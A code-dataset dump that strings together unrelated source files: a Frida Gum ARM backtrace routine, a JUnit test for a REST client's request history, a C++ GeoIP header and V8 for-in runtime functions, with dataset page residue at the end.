{
gboolean valid = FALSE;
gsize value;
GumMemoryRange vr;
if ((GPOINTER_TO_SIZE (p) & (4096 - 1)) == 0)
{
GumMemoryRange next_range;
next_range.base_address = GUM_ADDRESS (p);
next_range.size = 4096;
if (!gum_memory_map_contains (self->writable, &next_range))
break;
}
value = *p;
vr.base_address = value - 4;
vr.size = 4;
if (value > 4096 + 4 && gum_memory_map_contains (self->code, &vr))
{
gsize translated_value;
translated_value = GPOINTER_TO_SIZE (gum_invocation_stack_translate (
invocation_stack, GSIZE_TO_POINTER (value)));
if (translated_value != value)
{
value = translated_value;
valid = TRUE;
}
else
{
if (value % 4 == 0)
{
const guint32 insn = GUINT32_FROM_LE (
*((guint32 *) GSIZE_TO_POINTER (value - 4)));
if ((insn & 0xf000000) == 0xb000000)
{
/* BL <imm24> */
valid = TRUE;
}
else if ((insn & 0xfe000000) == 0xfa000000)
{
/* BLX <imm24> */
valid = TRUE;
}
else if ((insn & 0xff000f0) == 0x1200030)
{
/* BLX Rx */
valid = TRUE;
}
}
else if ((value & 1) != 0)
{
const guint16 * insns_before = GSIZE_TO_POINTER (value - 1 - 2 - 2);
if ((GUINT16_FROM_LE (insns_before[0]) & 0xf800) == 0xf000 &&
(GUINT16_FROM_LE (insns_before[1]) & 0xe800) == 0xe800)
{
/* BL/BLX <imm11> */
value--;
valid = TRUE;
}
else if ((GUINT16_FROM_LE (insns_before[1]) & 0xff80) == 0x4780)
{
/* BLX Rx */
value--;
valid = TRUE;
}
}
}
}
if (valid)
{
if (skips_pending == 0)
{
return_addresses->items[i++] = GSIZE_TO_POINTER (value);
if (i == depth)
break;
}
else
{
skips_pending--;
}
}
}
return_addresses->len = i;
}
| 2,439
|
1,444
|
package org.wiztools.restclient.ui.history;
import java.net.URL;
import org.junit.*;
import static org.junit.Assert.*;
import org.wiztools.restclient.bean.RequestBean;
/**
*
* @author subwiz
*/
public class HistoryManagerImplTest {
public HistoryManagerImplTest() {
}
@BeforeClass
public static void setUpClass() throws Exception {
}
@AfterClass
public static void tearDownClass() throws Exception {
}
@Before
public void setUp() {
}
@After
public void tearDown() {
}
/**
* Test of push method, of class HistoryManagerImpl.
*/
@Test
public void testAll() throws Exception {
System.out.println("all");
HistoryManagerImpl instance = new HistoryManagerImpl();
instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
for(int i=0; i<10; i++) {
RequestBean request = new RequestBean();
request.setUrl(new URL("http://localhost/" + i));
instance.add(request);
}
assertTrue(instance.isMostRecent());
System.out.println("Current after 10 additions: " + instance.current());
for(int i=0; i<10; i++) {
instance.back();
}
assertTrue(instance.isOldest());
System.out.println("Current after 10 backs: " + instance.current());
for(int i=0; i<5; i++) {
instance.forward();
}
System.out.println("Current after 5 forwards: " + instance.current());
System.out.println("Cursor position: " + instance.cursor());
RequestBean request = new RequestBean();
request.setUrl(new URL("http://localhost/NEW"));
instance.add(request);
assertEquals(7, instance.size());
System.out.println(instance);
}
@Test
public void testSetHistorySize() throws Exception {
System.out.println("setHistorySize");
HistoryManagerImpl instance = new HistoryManagerImpl();
instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
for(int i=0; i<10; i++) {
RequestBean request = new RequestBean();
request.setUrl(new URL("http://localhost/" + i));
instance.add(request);
}
instance.setHistorySize(5);
assertEquals(5, instance.size());
}
@Test
public void testMaxElements() throws Exception {
System.out.println("maxElements");
HistoryManagerImpl instance = new HistoryManagerImpl();
instance.setHistorySize(HistoryManager.DEFAULT_HISTORY_SIZE);
instance.setHistorySize(9);
for(int i=0; i<10; i++) {
RequestBean request = new RequestBean();
request.setUrl(new URL("http://localhost/" + i));
instance.add(request);
}
System.out.println("Elements in History: " + instance);
assertEquals(9, instance.size());
}
}
| 1,294
|
3,056
|
<reponame>siemenstutorials/stairspeedtest-reborn<gh_stars>1000+
#ifndef GEOIP_H_INCLUDED
#define GEOIP_H_INCLUDED
#include <string>
struct geoIPInfo
{
std::string ip;
std::string country_code;
std::string country;
std::string region_code;
std::string region;
std::string city;
std::string postal_code;
std::string continent_code;
std::string latitude;
std::string longitude;
std::string organization;
std::string asn;
std::string timezone;
};
geoIPInfo getGeoIPInfo(const std::string &ip, const std::string &proxy);
#endif // GEOIP_H_INCLUDED
| 236
|
5,964
|
<reponame>wenfeifei/miniblink49
// Copyright 2015 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/runtime/runtime-utils.h"
#include "src/arguments.h"
#include "src/objects-inl.h"
namespace v8 {
namespace internal {
RUNTIME_FUNCTION(Runtime_ForInDone) {
SealHandleScope scope(isolate);
DCHECK_EQ(2, args.length());
CONVERT_SMI_ARG_CHECKED(index, 0);
CONVERT_SMI_ARG_CHECKED(length, 1);
DCHECK_LE(0, index);
DCHECK_LE(index, length);
return isolate->heap()->ToBoolean(index == length);
}
RUNTIME_FUNCTION(Runtime_ForInFilter) {
HandleScope scope(isolate);
DCHECK_EQ(2, args.length());
CONVERT_ARG_HANDLE_CHECKED(JSReceiver, receiver, 0);
CONVERT_ARG_HANDLE_CHECKED(Object, key, 1);
// TODO(turbofan): Fast case for array indices.
Handle<Name> name;
if (!Object::ToName(isolate, key).ToHandle(&name)) {
return isolate->heap()->exception();
}
Maybe<bool> result = JSReceiver::HasProperty(receiver, name);
if (!result.IsJust()) return isolate->heap()->exception();
if (result.FromJust()) return *name;
return isolate->heap()->undefined_value();
}
RUNTIME_FUNCTION(Runtime_ForInNext) {
HandleScope scope(isolate);
DCHECK_EQ(4, args.length());
CONVERT_ARG_HANDLE_CHECKED(JSReceiver, receiver, 0);
CONVERT_ARG_HANDLE_CHECKED(FixedArray, cache_array, 1);
CONVERT_ARG_HANDLE_CHECKED(Object, cache_type, 2);
CONVERT_SMI_ARG_CHECKED(index, 3);
Handle<Object> key = handle(cache_array->get(index), isolate);
// Don't need filtering if expected map still matches that of the receiver,
// and neither for proxies.
if (receiver->map() == *cache_type || *cache_type == Smi::FromInt(0)) {
return *key;
}
// TODO(turbofan): Fast case for array indices.
Handle<Name> name;
if (!Object::ToName(isolate, key).ToHandle(&name)) {
return isolate->heap()->exception();
}
Maybe<bool> result = JSReceiver::HasProperty(receiver, name);
if (!result.IsJust()) return isolate->heap()->exception();
if (result.FromJust()) return *name;
return isolate->heap()->undefined_value();
}
RUNTIME_FUNCTION(Runtime_ForInStep) {
SealHandleScope scope(isolate);
DCHECK_EQ(1, args.length());
CONVERT_SMI_ARG_CHECKED(index, 0);
DCHECK_LE(0, index);
DCHECK_LT(index, Smi::kMaxValue);
return Smi::FromInt(index + 1);
}
} // namespace internal
} // namespace v8
| 899
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.